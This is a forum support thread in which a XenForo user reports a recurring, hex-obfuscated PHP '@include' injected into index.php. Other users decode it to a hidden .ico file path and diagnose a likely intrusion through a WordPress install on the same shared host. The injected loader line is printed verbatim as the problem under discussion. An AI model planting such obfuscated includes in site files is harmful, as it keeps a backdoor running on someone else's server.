XF 2.0 Problem with index.php

[AbuGhaith]

i hope is the right place to post this
this code is automatically add to the index.php file

/*93e62*/


@include "\x2fhom\x65/mz\x61mee\x72/pu\x62lic\x5fhtm\x6c/be\x6e-tw\x61ma/\x312/.\x6215f\x66c8b\x2eico";


/*93e62*/

and the index.php file become like this

<?php


/*93e62*/

@include "\x2fhom\x65/mz\x61mee\x72/pu\x62lic\x5fhtm\x6c/be\x6e-tw\x61ma/\x312/.\x6215f\x66c8b\x2eico";

/*93e62*/

$phpVersion = phpversion();
if (version_compare($phpVersion, '5.4.0', '<'))
{
    die("PHP 5.4.0 or newer is required. $phpVersion does not meet this requirement. Please ask your host to upgrade PHP.");
}

$dir = __DIR__;
require($dir . '/src/XF.php');

XF::start($dir);
XF::runApp('XF\Pub\App');

 

[TPerry]

Are you on a shared hosting provider? That does NOT look like something that is standard in the index.php and could be indicative of the server having an intrusion done (hacked). This can happen on a poorly secured VPS/dedi and even on a shared hosting environment.
Are you by chance also running WordPress on the same hosting account?
The reason I ask is that decodes to

include "/home/mzameer/public_html/ben-twama/12/.b15ffc8b.ico";

courtesy of http://ddecode.com/hexdecoder/.

 

[AbuGhaith]

Thank you Tracy Perry for you reply

Yes in the shared hosting, also running Wordpress in the same hosting,

 

[TPerry]

I'd suggest visiting https://sitecheck.sucuri.net/ and entering the WordPress domain there and check... odds are you have an outdated WordPress installation or a plugin that has a security hole that has been found and exploited.

 

[AbuGhaith]

nothing found

 

[TPerry]

Have you checked the file integrity in the ACP of XenForo?
yourdomain.com/admin.php?tools/file-check/
That will tell you if the index.php has been modified. If so, then odds still are you have had an intrusion via WordPress. The Sucuri site is not a guarantee as it mainly looks for malware from the web interface. Hopefully you are running something like WordFence or similar.

 

[AbuGhaith]

thank you Tracy Perry i will check it

 

[Chris D]

That will tell you if the index.php has been modified.

If that content is in the index.php file, then of course it will come up as modified.

 

[AbuGhaith]

If that content is in the index.php file, then of course it will come up as modified.

when the file modified, it return with the same code

 

[Chris D]

Certainly sounds like something malicious.

You should notify your host to see if they’re able to help.

 

[TPerry]

If that content is in the index.php file, then of course it will come up as modified.

Was pretty sure it was... but I'm not running 2.0 on any sites (since I'm down to only one forum now)... so wasn't sure what was in the new version. It stood to reason something like that would not be.